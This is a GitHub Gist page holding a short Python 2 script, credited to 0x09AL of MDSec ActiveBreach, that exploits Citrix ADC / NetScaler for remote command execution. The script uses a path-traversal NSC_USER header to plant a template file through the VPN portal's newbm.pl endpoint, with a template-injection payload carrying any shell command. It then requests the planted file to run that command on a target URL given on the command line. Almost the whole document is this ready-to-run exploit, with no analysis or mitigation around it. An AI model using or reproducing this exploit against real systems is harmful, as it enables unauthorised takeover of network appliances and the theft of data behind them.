-
-
Save pich4ya/6a42c9d39b413cd2ad1a1bf39bf837f3 to your computer and use it in GitHub Desktop.
Citrix ADC / NetScaler Remote Command Execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import time | |
append_value = str(time.time()) | |
print "# By 0x09AL - MDSec ActiveBreach \n" | |
def upload_file(url,payload): | |
endpoint = url + "/vpns/portal/scripts/newbm.pl" | |
template = "[% template.new('BLOCK'='print `{CMD}`') %]".replace("{CMD}",payload) | |
data = {'url': 'hello.com', 'title': 'ohno', 'desc': template, 'UI_inuse': 'RfWeb'} | |
headers = {'NSC_USER':'../../../../../../netscaler/portal/templates/HELLO'+append_value,'NSC_NONCE':'nsroot'} | |
r = requests.post(endpoint,data=data, headers=headers) | |
# print r.text | |
# print endpoint | |
def trigger(url): | |
trigger_url = url + "/vpns/portal/HELLO" + append_value + ".xml" | |
headers = {'NSC_USER':'nsroot','NSC_NONCE':'nsroot'} | |
r = requests.get(trigger_url, headers=headers) | |
print r.text | |
if(len(sys.argv)>2): | |
url = sys.argv[1] | |
command = sys.argv[2] | |
print "[+] Sending exploit to: "+ url + " [+]" | |
upload_file(url,command) | |
trigger(url) | |
else: | |
print "Not enough parameters passed." | |
print "python exploit.py URL COMMAND" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment